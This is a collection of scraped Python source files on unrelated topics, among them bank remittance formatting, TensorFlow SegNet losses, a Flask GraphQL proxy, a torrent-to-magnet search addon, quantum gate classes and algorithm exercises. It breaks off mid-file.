+{"seq_id":"620647817","text":"import asyncio\nfrom functools import wraps\n\n\nclass ExceptionHandler(object):\n def __init__(self, att):\n self.att = att\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_instance, tracebacks):\n if exc_type is None:\n return True\n if issubclass(exc_type, KeyError):\n return True\n elif issubclass(exc_type, ValueError):\n return True\n elif issubclass(exc_type, IndexError):\n return True\n elif issubclass(exc_type, AttributeError):\n return True\n elif issubclass(exc_type, TypeError):\n return True\n return False\n\n\ndef retry(retry_times=6, exc_handler=ExceptionHandler):\n def outter(func):\n @wraps(func)\n async def inner(*args, **kwargs):\n att = 0\n while att <= retry_times:\n async with exc_handler(att):\n result = await func(*args, **kwargs)\n return result\n att += 1\n return\n return inner\n return outter\n","sub_path":"base/exceptioner.py","file_name":"exceptioner.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"267168195","text":"from kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import (MDFillRoundFlatButton,\n MDFlatButton)\n\ndef error_dialogue(screen, message):\n\n dialog = MDDialog(\n text = message,\n buttons = [\n MDFlatButton(\n text = \"OK\",\n #on_release= MainApp().change_screen(screen)\n )\n ]\n )\n dialog.open()\n\n","sub_path":"Dialogue.py","file_name":"Dialogue.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"219536258","text":"# -*- encoding: utf-8 -*-\n\nfrom debauto.remessa import Remessa\nfrom debauto.utils import formata_data, formata_valor\n\n\nclass Caixa(Remessa):\n \"\"\"\n Caixa\n \"\"\"\n __a = \"A{:1}{:20}{:20}{:3}{:20}{:8}{:6}{:2}{:17}{:45}{:0>7}\\r\\n\"\n __e = \"E{:0>25}{:0<4}{:14}{:8}{:0<15}{:2}{:60}{:6}{:8}{:0>6}{:1}\\r\\n\"\n __z = \"Z{:0>6}{:0>17}{:119}{:0>6}{:1}\"\n\n def __init__(self, *args, **kwargs):\n super(Caixa, self).__init__(*args, **kwargs)\n\n self.__cod_remessa = 1\n self.__banco = \"CAIXA\"\n self.__codigo = \"104\"\n self.__versao = '04'\n self.__identificacao = \"DEB AUTOMAT\"\n\n @property\n def banco(self):\n return \"%s\" % self.__banco\n\n def get_header(self):\n \"\"\" retorna o header do arquivo \"\"\"\n cfg = self.configuracao\n\n return self.__a.format(\n self.__cod_remessa, # 1 - Código da remessa\n cfg.convenio, # 20 - Código do convênio\n cfg.empresa, # 20 - Nome da empresa\n self.__codigo, # 3 - Código do banco\n self.__banco, # 20 - Nome do banco\n formata_data(cfg.vencimento), # 8 - Data do movimento\n cfg.sequencial, # 6 - Número sequencial\n self.__versao, # 2 - Versão do layout\n self.__identificacao, # 17 - Identificação do serviço\n '', '0'\n )\n\n def get_debitos(self):\n \"\"\" retorna as linhas e do arquivo \"\"\"\n linhas = []\n\n for n, x in enumerate(self.debitos, 1):\n linhas.append(self.__e.format(\n x.identificacao,\n x.agencia,\n x.conta,\n formata_data(x.vencimento),\n formata_valor(x.valor),\n x.moeda,\n x.livre,\n \"\",\n \"\",\n n,\n x.tipo\n ))\n\n return linhas\n\n def get_trailler(self):\n \"\"\" retorna o trailler do arquivo \"\"\"\n return self.__z.format(\n self.quantidade() + 2,\n formata_valor(self.valor_total()),\n '',\n self.quantidade() + 1,\n ''\n )\n\n def gerar_txt(self, path):\n cfg = self.configuracao\n nome = \"%s_%s_%s.txt\" % (self.banco, formata_data(cfg.vencimento), cfg.sequencial)\n\n with open('%s%s' % (path, nome), 'w+') as f:\n f.write(self.get_header())\n\n for _ in self.get_debitos():\n f.write(_)\n\n f.write(self.get_trailler())\n\n def __repr__(self):\n \"\"\" representação do objeto \"\"\"\n return \"\" % self.banco\n","sub_path":"debauto/bancos/caixa.py","file_name":"caixa.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"325359441","text":"__author__ = 'Young'\n\n\"\"\"\nImplement int sqrt(int x).\n\nCompute and return the square root of x.\n\"\"\"\n\n\nclass Solution(object):\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n y = x\n while y*y > x:\n y = (y + x/y)/2\n return y\n","sub_path":"sqrt(x).py","file_name":"sqrt(x).py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"596396739","text":"import tensorflow as tf\nimport numpy as np\n\n\n\ndef normal_loss(logits, labels, num_classes):\n \"\"\"This function focus on computing normal loss.\n \n Args:\n logits: 4D tensor. output tensor from segnet model, which is the output of the decode without softmax\n labels: true label tensor\n num_classes: the number of classes for the dataset \n Returns:\n loss, accuracy, prediction(logits with softmax) \n \n \"\"\"\n # flatten the labels\n labels_flatten = tf.reshape(labels, [-1])\n labels_one_hot = tf.one_hot(labels_flatten, depth=num_classes)\n logits_reshape = tf.reshape(logits, [-1, num_classes])\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels_one_hot, \n logits=logits_reshape, \n name='cross_entropy')\n \n # compute loss, which is cross entropy mean\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n tf.summary.scalar(name='loss', tensor=cross_entropy_mean)\n \n # compute prediction for labels\n predicts = tf.argmax(logits_reshape, axis=-1)\n true_predicts = tf.equal(predicts, labels_flatten)\n \n # compute accuracy\n accuracy = tf.reduce_mean(tf.cast(true_predicts, tf.float32))\n tf.summary.scalar(name='loss', tensor=accuracy)\n \n return cross_entropy_mean, accuracy, predicts\n\n\ndef weighted_loss(logits, labels, num_classes, frequency):\n \"\"\"This function focus on computing weighted loss. Here frequency represents balancing frequency for each label, the formul\n is following: frequency=ln(total_sample/sample(c)), total_sample is the toatl sample of pixels in images, sample(c) is the \n number of pixels of class c in the images\n \n Args:\n logits: 4D tensor. output tensor from segnet model, which is the output of the decode without softmax\n labels: true label tensor\n num_classes: the number of classes for the dataset \n frequency: the weights for each classes\n Returns:\n loss, accuracy, prediction(logits with softmax) \n \n \"\"\"\n # flatten the labels\n labels_flatten = tf.reshape(labels, [-1])\n labels_one_hot = tf.one_hot(labels_flatten, depth=num_classes)\n logits_reshape = tf.reshape(logits, [-1, num_classes])\n cross_entropy = tf.nn.weighted_cross_entropy_with_logits(labels=labels_one_hot, \n logits=logits_reshape, \n pos_weight=frequency)\n # compute loss, which is cross entropy mean\n \n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n tf.summary.scalar(name='loss', tensor=cross_entropy_mean)\n \n # compute prediction for labels\n predicts = tf.argmax(logits_reshape, axis=-1)\n true_predicts = tf.equal(predicts, labels_flatten)\n \n # compute accuracy\n accuracy = tf.reduce_mean(tf.cast(true_predicts, tf.float32))\n tf.summary.scalar(name='loss', tensor=accuracy)\n \n return cross_entropy_mean, accuracy, tf.argmax(logits_reshape, axis=-1)\n \n \ndef calc_loss(logits, labels, num_classes):\n \"\"\"\n \n \"\"\"\n loss_weight = np.array([0.2595, 2.3614, 2.5640, 0.1417, 0.6823, 0.9051, \n 0.3826, 1.8418, 2.6446, 0.2478, 0.1826, 1.0974, 0.2253])\n \n # class 0 to 12, but the class 11 is ignored, so maybe the class 11 is background!\n\n labels = tf.cast(labels, dtype=tf.int64)\n loss, accuracy, prediction = weighted_loss(logits, labels, num_classes=num_classes, frequency=loss_weight)\n return loss, accuracy, prediction\n \n \n\ndef train_op(total_loss, global_steps, base_learning_rate):\n \"\"\"This function defines train optimizer \n Args:\n total_loss: the loss value\n global_steps: global steps is used to track how many batch had been passed. In the training process, the initial value for global_steps = 0, here \n global_steps=tf.Variable(0, trainable=False). then after one batch of images passed, the loss is passed into the optimizer to update the weight, then the global \n step increased by one.\n Returns:\n the train optimizer\n \"\"\"\n # get updated opration \n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n # base_learning_rate = 0.1\n # define learning rate decay strategy, here we used exponentiel_decay\n learning_rate_decay = tf.train.exponential_decay(base_learning_rate, global_steps, 1000, 0.0005)\n optimizer = tf.train.GradientDescentOptimizer(learning_rate_decay)\n print(\"Running with Adam Optimizer with learning rate:\", learning_rate_decay)\n \n grads = optimizer.compute_gradients(total_loss)\n training_op = optimizer.apply_gradients(grads, global_step=global_steps)\n \n return training_op\n \n \n\ndef per_class_acc(predicts, labels):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n #labels = labels\n\n batch_size = predicts.shape[0]\n num_classes = predicts.shape[3]\n hist = np.zeros((num_classes, num_classes))\n for i in range(batch_size):\n hist += fast_hist(labels[i].flatten(), predicts[i].argmax(2).flatten(), num_classes)\n total_acc = np.diag(hist).sum() / hist.sum()\n print('accuracy = %f' %np.nanmean(total_acc))\n \n iou = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n print('mean IoU = %f' % np.nanmean(iou))\n for i in range(num_classes):\n if float(hist.sum(1)[i]) == 0:\n acc = 0.0\n else:\n acc = np.diag(hist)[i] / float(hist.sum(1)[i])\n print(\"class %d accuracy = %f \" % (i, acc))\n\n\ndef fast_hist(a, b, n):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n k = (a >= 0) & (a < n)\n return np.bincount(n * a[k].astype(int) + b[k], minlength=n**2).reshape(n, n)\n\n\ndef get_hist(predicts, labels):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n num_classes = predicts.shape[3] \n batch_size = predicts.shape[0]\n hist = np.zeros((num_classes, num_classes))\n for i in range(batch_size):\n hist += fast_hist(labels[i].flatten(), predicts[i].argmax(2).flatten(), num_classes)\n return hist\n\n\n\ndef print_hist_summary(hist):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n total_acc = np.diag(hist).sum() / hist.sum()\n print('accuracy = %f' % np.nanmean(total_acc))\n iou = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n print('mean IoU = %f' % np.nanmean(iou))\n for i in range(hist.shape[0]):\n if float(hist.sum(1)[i]) == 0:\n acc = 0.0\n else:\n acc = np.diag(hist)[i] / float(hist.sum(1)[i])\n print(\"class %d accuracy = %f \" %(i, acc))\n","sub_path":"segnet/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"37824001","text":"from docker.errors import APIError\nfrom flask import request, jsonify, make_response\nfrom flask_restplus import Resource, fields, Namespace, Api\nfrom proxy.exceptions import RequestException\nfrom proxy.interceptor import Interceptor\nfrom proxy.utils import validate_graphql_request, execute_graphql_request\nfrom security.decorators import token_required\n\n# pylint: disable=unused-variable\n\n\ndef register_graphql(namespace: Namespace, api: Api):\n \"\"\"Method used to register the GraphQL namespace and endpoint.\"\"\"\n\n # Create expected headers and payload\n headers = api.parser()\n payload = api.model('Payload', {'query': fields.String(\n required=True,\n description='GraphQL query or mutation',\n example='{allIndicatorTypes{nodes{id,name}}}')})\n\n @namespace.route('/graphql', endpoint='with-parser')\n @namespace.doc()\n class GraphQL(Resource):\n decorators = [token_required]\n\n @namespace.expect(headers, payload, validate=True)\n def post(self):\n \"\"\"\n Execute GraphQL queries and mutations\n Use this endpoint to send http request to the GraphQL API.\n \"\"\"\n payload = request.json\n\n try:\n # Validate http request payload and convert it to GraphQL document\n graphql_document = validate_graphql_request(\n payload['query'])\n\n # Verify GraphQL mutation can be handled\n interceptor = Interceptor()\n mutation_name = interceptor.get_mutation_name(graphql_document)\n\n # Surcharge payload before request\n if mutation_name:\n payload['query'] = interceptor.before_request(\n mutation_name)\n\n # Execute request on GraphQL API\n status, data = execute_graphql_request(payload)\n if status != 200:\n raise RequestException(status, data)\n\n # Execute custom scripts after request\n if mutation_name:\n data = interceptor.after_request(mutation_name, data)\n\n return make_response(jsonify(data), status)\n\n except RequestException as exception:\n return exception.to_response()\n\n except APIError as exception:\n return make_response(jsonify({'message': exception.explanation}), exception.status_code)\n","sub_path":"api/init/proxy/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"365225315","text":"import sys\nimport json\nimport base64\nimport re\nimport urllib\nimport urllib2\nimport bencode\nimport hashlib \n\nPAYLOAD = json.loads(base64.b64decode(sys.argv[1]))\n\ndef search(query):\n response = urllib2.urlopen(\"https://yts.re/browse-movie/%s\" % urllib.quote_plus(query))\n data = response.read()\n if response.headers.get(\"Content-Encoding\", \"\") == \"gzip\":\n import zlib\n data = zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data)\n return [{\"uri\": torrent2magnet(torrent)} for torrent in re.findall(r'https://.*\\.torrent', data)]\n\t\ndef search_episode(imdb_id, tvdb_id, name, season, episode):\n return []\n\ndef search_movie(imdb_id, name, year):\n return search(imdb_id)\n\ndef torrent2magnet(torrent_url):\n response = urllib2.urlopen(torrent_url)\n torrent = response.read()\n metadata = bencode.bdecode(torrent)\n hashcontents = bencode.bencode(metadata['info'])\n digest = hashlib.sha1(hashcontents).digest()\n b32hash = base64.b32encode(digest)\n magneturl = 'magnet:?xt=urn:btih:' + b32hash + '&dn=' + metadata['info']['name']\n return magneturl\n\nurllib2.urlopen(\n PAYLOAD[\"callback_url\"],\n data=json.dumps(globals()[PAYLOAD[\"method\"]](*PAYLOAD[\"args\"]))\n)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"165790206","text":"#!/usr/bin/env python3\nimport json\n\nclass routePlan:\n\tdef route(inFile, outFile, cSpeed):\n\t\tx = [];\n\t\ty = [];\n\t\tz = [];\n\t\tfData = open(inFile, 'r');\n\t\tfor line in fData :\n\t\t\tcsv = line.split(',');\n\t\t\tx.append(float(csv[0]));\n\t\t\ty.append(float(csv[1]));\n\t\t\tz.append(float(csv[2]));\n\t\tfData.close();\n\t\t\n\t\t# Boiler plate code for creating a route plan\n\t\tplan = {};\n\t\tgeoFence = {};\n\t\tplan['fileType'] = 'Plan';\n\t\tgeoFence['polygon'] = [];\n\t\tgeoFence['version'] = 1;\n\t\tplan['geoFence'] = geoFence;\n\t\tplan['groundStation'] = 'QGroundControl';\n\t\titems = [];\n\t\t\n\t\t# add datapoints\n\t\titem = {};\n\t\titem['autoContinue'] = True;\n\t\titem['command'] = 22;\n\t\titem['doJumpId'] = 1;\n\t\titem['frame'] = 3;\n\t\titem['params'] = [0,0,0,0,x[0],y[0],z[0]];\n\t\titem['type'] = 'SimpleItem';\n\t\titems.append (item);\n\t\t\n\t\tfor i in range(1,len(x)) :\n\t\t\titem = {};\n\t\t\titem['autoContinue'] = True;\n\t\t\titem['command'] = 16;\n\t\t\titem['doJumpId'] = 2;\n\t\t\titem['frame'] = 3;\n\t\t\titem['params'] = [0,0,0,0,x[i],y[i],z[i]];\n\t\t\titem['type'] = 'SimpleItem';\n\t\t\titems.append (item);\n\t\t\n\t\t# Establish mission\t\n\t\tmission = {}\n\t\tmission['cruiseSpeed'] = cSpeed;\n\t\tmission['firmwareType'] = 3;\n\t\tmission['hoverSpeed'] = 5;\n\t\tmission['items'] = items;\n\t\tmission['plannedHomePosition'] = [x[0], y[0], z[0]];\n\t\tmission['vehicleType'] = 2;\n\t\tmission['version'] = 2;\n\t\tplan['mission'] = mission;\n\t\t\n\t\t# Rally points\n\t\trallyPoints = {};\n\t\trallyPoints['points'] = []; \n\t\trallyPoints['version'] = 1;\n\t\tplan['rallyPoints'] = rallyPoints;\n\n\t\t# plan version\n\t\tplan['version'] = 1\n\n\t\t# Create JSON file\n\t\tplan_json = json.dumps(plan, indent=4, sort_keys=True)\n\n\t\tfile = open(outFile,'w') \n\t\tfile.write (plan_json)\n\t\tfile.close()\n","sub_path":"UTMHandling/route/routePlan.py","file_name":"routePlan.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"86243472","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 2021\n@author: Alex https://github.com/alexcasella\n\"\"\"\n# Awesome Streamlit\nimport streamlit as st\n\n# Add pages -- see those files for deatils within\nfrom page_joseph import page_joseph\nfrom page_rohit import page_rohit\nfrom page_introduction import page_introduction\nfrom page_kanishk import page_kanishk\n\n# Use random seed\nimport numpy as np\nnp.random.seed(1)\n\n\n# Set the default elements on the sidebar\nst.set_page_config(page_title='SteamingHot',layout='wide')\n\nst.markdown(\"

\\\n Steaming Hot

\", unsafe_allow_html=True)\n\nst.sidebar.write(\" \")\n\n\ndef main():\n \"\"\"\n Register pages to Explore and Fit:\n page_introduction - contains page with images and brief explanations\n page_joseph - contains joseph's algorithm\n page_rohit - rohit's algorithm\n page_kanishk - kanishk's algorithm\n \"\"\"\n\n pages = {\n \"Introduction\": page_introduction,\n \"Time Comparison\": page_joseph,\n \"Feature Score\": page_rohit,\n \"Owners Prediction\" : page_kanishk\n }\n\n st.sidebar.title(\"Main options\")\n\n # Radio buttons to select desired option\n page = st.sidebar.radio(\"Select:\", tuple(pages.keys()))\n \n # Display the selected page with the session state\n pages[page]()\n\n # Write About\n st.sidebar.header(\"About\")\n st.sidebar.warning(\n \"\"\"\n SteamingHot app is created and maintained by \n **Alex Casella**. If you like this app please star its\n [**GitHub**](https://github.com/alexcasella)\n repo, share it and feel free to open an issue if you find a bug \n or if you want some additional features.\n \"\"\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"496024279","text":"from src.services.decorators import allow_roles\nfrom src.repos.category import CategoryRepo\n\n\nclass CategoryService:\n def __init__(self, repo: CategoryRepo):\n self._repo = repo\n\n def get_all(self):\n return self._repo.get_all()\n\n def get_one(self, id_):\n try:\n return self._repo.get_by_id(id_)\n except self._repo.DoesNotExist:\n raise self.CategoryNotFound()\n\n @allow_roles(['admin', 'manager'])\n def create(self, data, *args, **kwargs):\n with self._repo.session() as s:\n return self._repo.add_category(\n data['names'],\n data.get('parent_category_id'),\n session=s\n )\n\n @allow_roles(['admin', 'manager'])\n def update(self, id_, data, *args, **kwargs):\n try:\n with self._repo.session() as s:\n parent_category_id = data.get('parent_category_id')\n if (parent_category_id != None and parent_category_id == id_):\n raise self.CircularCategoryConnection()\n\n return self._repo.update_category(\n id_,\n data['names'],\n parent_category_id,\n session=s\n )\n except self._repo.DoesNotExist:\n raise self.CategoryNotFound()\n\n @allow_roles(['admin', 'manager'])\n def delete(self, id_):\n try:\n return self._repo.delete(id_)\n except self._repo.DoesNotExist:\n raise self.CategoryNotFound()\n\n class CategoryNotFound(Exception):\n pass\n\n class CircularCategoryConnection(Exception):\n pass\n","sub_path":"backend/src/services/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"203188880","text":"\"\"\"\nCreated on Sun Feb 2 13:28:48 2020\n\n@author: matias\n\"\"\"\n\nimport numpy as np\nimport emcee\n\nimport sys\nimport os\nfrom pc_path import definir_path\npath_git, path_datos_global = definir_path()\nos.chdir(path_git)\nsys.path.append('./Software/Funcionales/')\nfrom funciones_int_sist_1 import Hubble_teorico_1\n\ndef parametros_derivados(sampler,discard, thin,model='EXP'):\n\t'''Esta función convierte las cadenas de omega_m y H0 de LCDM\n\ten las cadenas de omega_m y H0 fisicas'''\n\tflat_samples = sampler.get_chain(discard=discard, flat=True, thin=thin)\n\tlen_chain=flat_samples.shape[0]\n\tnew_samples = np.full_like(flat_samples,1)\n\tfor i in range(len_chain):\n\t#for i in range(1000,1100):\n\t\tif len(flat_samples[0,:])==3:\n\t\t\tomega_m_lcdm = flat_samples[i,0]\n\t\t\tb = flat_samples[i,1]\n\t\t\tH0_lcdm = flat_samples[i,2]\n\t\t\t_, Hubble = Hubble_teorico_1([omega_m_lcdm,b,H0_lcdm], verbose=False, model=model)\n\t\t\tH0 = Hubble[0]\n\t\t\tomega_m = omega_m_lcdm * (H0_lcdm/H0)**2\n\n\t\t\tnew_samples[i,0] = omega_m\n\t\t\tnew_samples[i,1] = b\n\t\t\tnew_samples[i,2] = H0\n\t\telif len(flat_samples[0,:])==4:\n\t\t\tomega_m_lcdm = flat_samples[i,1]\n\t\t\tb = flat_samples[i,2]\n\t\t\tH0_lcdm = flat_samples[i,3]\n\t\t\t_, Hubble = Hubble_teorico_1([omega_m_lcdm,b,H0_lcdm], verbose=False, model=model)\n\t\t\tH0 = Hubble[0]\n\t\t\tomega_m = omega_m_lcdm * (H0_lcdm/H0)**2\n\n\t\t\tnew_samples[i,0] = flat_samples[i,0]\n\t\t\tnew_samples[i,1] = omega_m\n\t\t\tnew_samples[i,2] = b\n\t\t\tnew_samples[i,3] = H0\n\n\t#\tprint('Completado: {}/{}'.format(i,len_chain))\n\treturn new_samples\n","sub_path":"Software/Funcionales/funciones_parametros_derivados.py","file_name":"funciones_parametros_derivados.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"84381355","text":"\"\"\"\n升序排列的整数数组 nums 在预先未知的某个点上进行了旋转(例如, [0,1,2,4,5,6,7] 经旋转后可能变为[4,5,6,7,0,1,2] )。\n请你在数组中搜索target ,如果数组中存在这个目标值,则返回它的索引,否则返回-1。\n\n示例 1:\n输入:nums = [4,5,6,7,0,1,2], target = 0\n输出:4\n\n示例2:\n输入:nums = [4,5,6,7,0,1,2], target = 3\n输出:-1\n\n示例 3:\n输入:nums = [1], target = 0\n输出:-1\n\n\n\"\"\"\n\n\"\"\"\n题目要求算法时间复杂度必须是 O(\\log n)O(logn) 的级别,这提示我们可以使用二分搜索的方法。\n\n但是数组本身不是有序的,进行旋转后只保证了数组的局部是有序的,这还能进行二分搜索吗?答案是可以的。\n\n可以发现的是,我们将数组从中间分开成左右两部分的时候,一定有一部分的数组是有序的。\n拿示例来看,我们从 6 这个位置分开以后数组变成了 [4, 5, 6] 和 [7, 0, 1, 2] 两个部分,\n其中左边 [4, 5, 6] 这个部分的数组是有序的,其他也是如此。\n\n\"\"\"\n\n#大神做法1\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n length = len(nums)\n left, right = 0, length - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n if nums[mid] == target:\n return mid\n if nums[0] <= nums[mid]: # mid在左半边有序��组\n if nums[0] <= target < nums[mid]: # 并且目标在左半边有序数组中\n right = mid - 1\n else:\n left = mid + 1\n else: # mid在右半边有序数组\n if nums[mid] < target <= nums[-1]: # 并且目标在右半边有序数组中\n left = mid + 1\n else:\n right = mid - 1\n\n return -1\n\n","sub_path":"中等33. 搜索旋转排序数组.py","file_name":"中等33. 搜索旋转排序数组.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"314755165","text":"class TofoliGate:\n def __init__(self, control, inv, length):\n self.control= control\n self.inv = inv\n self.length= length\n self.num = '-'\n def inf(self, bit):\n if bit == -1:\n return -1\n if bit&self.control == self.control:\n return bit^self.inv\n return bit\n# def cost():\n# count, c =0, self.control\n def control_num(self):\n if self.num != '-':\n return self.num\n num, point = 0, 1\n for i in range(self.length):\n if self.control&point == point:\n num += 1\n point *= 2\n self.num = num\n return num\n def __eq__(self, other):\n return self.control==other.control and self.inv==other.inv \\\n and self.length==other.length\n def __hash__(self):\n return hash((2^self.length*self.control)+self.inv)\n def __str__(self):\n dot, xor, string= self.control, self.inv, '--'\n for i in range(self.length):\n if dot%2==1:\n string = string + '·--'\n elif xor%2==1:\n string = string + '⊕--'\n else:\n string = string + '---'\n dot, xor = dot//2, xor//2\n string = string +'\\n'+'--'\n for i in range(self.length):\n string = string + '|--'\n return string\n\n\nclass SwapGate:\n def __init__(self, bit1, bit2, length):\n self.bit1= bit1\n self.bit2 = bit2\n self.length= length\n def inf(self, bit):\n if bit == -1:\n return -1\n b = bit|self.bit1|self.bit2\n if bit&self.bit1==0:\n b = b -self.bit2\n if bit&self.bit2==0:\n b = b - self.bit1\n return b\n def control_num(self):\n return 0\n def __eq__(self, other):\n return self.bit1==other.bit1 and self.bit2==other.bit2 \\\n and self.length==other.length\n def __str__(self):\n swap, string= self.bit1+self.bit2, '--'\n for i in range(self.length):\n if swap%2==1:\n string = string + 's--'\n else:\n string = string + '---'\n swap= swap//2\n string = string + '\\n--'\n for i in range(self.length):\n string = string + '|--'\n return string\n\nclass QCircuit:\n def __init__(self, q_list):\n self.list= q_list\n self.dict = {}\n for q in q_list:\n if not str(q.control_num()) in self.dict:\n self.dict[str(q.control_num())] = 1\n else: self.dict[str(q.control_num())] += 1\n def inf(self, bit):\n b = bit\n for q in self.list:\n b = q.inf(b)\n return b\n def __iter__(self):\n self.iterator = iter(self.list)\n return self\n def __del__(self):\n del self.list\n def __next__(self):return next(self.iterator)\n def __str__(self):\n string = ''\n for q in self.list:\n string = string + str(q)+'\\n'\n return string\n def __len__(self):\n return len(self.list)\n def __eq__(self, other):\n if len(self) != len(other): return False\n for i in range(len(self)):\n if not self.list[i]==other.list[i]:return False\n return True\n def add(self, circuit, typ):\n if typ == 'f':\n self.list= self.list + circuit.list\n else:\n self.list = circuit.list+ self.list\n for key in circuit.dict:\n if not key in self.dict:\n self.dict[key] = circuit.dict[key]\n else: self.dict[key] += circuit.dict[key]\n def reverse(self):\n self.list.reverse()\n result = QCircuit(self.list.copy())\n self.list.reverse()\n return result\n def cost(self, h_cost, typ='length'):\n if typ == 'length':\n #print(len(self))\n return len(self)\n if typ == 'Hamming':\n return h_cost\n if typ[:3]=='NCV':\n result = 0\n table = [1,1,5,13,29,61,125,253,509,1021]\n n_cost, c_cost, v_cost = int(typ[-3]), int(typ[-2]), int(typ[-1])\n for key in self.dict:\n if key == '0':\n result += (n_cost*self.dict['0'])\n elif key == '1':\n result += (c_cost*self.dict['1'])\n elif key == '2':\n result += ((2*c_cost + 3*v_cost)*self.dict['2'])\n elif int(key) < 10:\n result += (table[int(key)]*self.dict[key])\n else: result += ((1<<(int(key)+1))-3)*self.dict[key]\n #print(result)\n #print(\"complete\")\n return result \n \n \n'''\nt= SwapGate(1,4,3)\nl= QCircuit([t])\nprint(l)\nprint(l.inf(3))\n'''\n","sub_path":"gates.py","file_name":"gates.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"20033288","text":"from models.parser import Parser\nfrom models.processor import Processor\nfrom models.analyzer import Analyzer\n\nclass Pipeline:\n\n def __init__(self, data, user, trial):\n self.data = data\n self.user = user\n self.trial = trial\n self.parser, self.processor, self.analyzer = [None]*3\n self.feed()\n\n def feed(self):\n self.parser = Parser(self.data)\n self.processor = Processor(self.parser.parsed_data)\n self.analyzer = Analyzer(self.processor.filtered_data, self.user, self.trial)\n","sub_path":"models/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"204468182","text":"from . import RedirectTo\nfrom .BaseFormAction import BaseFormAction\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFFormController.FormController import registerFormAction\nfrom six.moves import reduce\n\n\ndef factory(arg):\n \"\"\"Create a new redirect-to-action action\"\"\"\n return RedirectToAction(arg)\n\n\nclass RedirectToAction(BaseFormAction):\n\n def __call__(self, controller_state):\n action = self.getArg(controller_state)\n action_url = None\n haveAction = False\n\n context = controller_state.getContext()\n fti = context.getTypeInfo()\n\n try:\n # Test to see if the action is defined in the FTI as an object or\n # folder action\n action_ob = fti.getActionObject('object/'+action)\n if action_ob is None:\n action_ob = fti.getActionObject('folder/'+action)\n action_url = action_ob.getActionExpression()\n haveAction = True\n except (ValueError, AttributeError):\n actions_tool = getToolByName(context, 'portal_actions')\n actions = actions_tool.listFilteredActionsFor(\n controller_state.getContext())\n # flatten the actions as we don't care where they are\n actions = reduce(lambda x,y,a=actions: x+a[y], actions.keys(), [])\n for actiondict in actions:\n if actiondict['id'] == action:\n action_url = actiondict['url'].strip()\n haveAction = True\n break\n\n # (note: action_url may now be an emptry string, but still valid)\n if not haveAction:\n raise ValueError('No %s action found for %s' % (action, controller_state.getContext().getId()))\n\n # XXX: Is there a better way to check this?\n if not action_url.startswith('string:'):\n action_url = 'string:%s' % (action_url,)\n return RedirectTo.RedirectTo(action_url)(controller_state)\n\nregisterFormAction('redirect_to_action',\n factory,\n 'Redirect to the action specified in the argument (a TALES expression) for the current context object (e.g. string:view)')\n","sub_path":"Products/CMFFormController/Actions/RedirectToAction.py","file_name":"RedirectToAction.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"329579092","text":"class Solution:\n def minWindow(self, s, t):\n start = 0\n minimum = float('inf')\n min_start = 0\n n = len(s)\n required = [0 for i in range(52)]\n present = [0 for i in range(52)]\n for j in t:\n required[ord(j) - ord('a')] += 1\n i = count = 0\n while i < n:\n present[ord(s[i]) - ord('a')] += 1\n if present[ord(s[i]) - ord('a')] <= 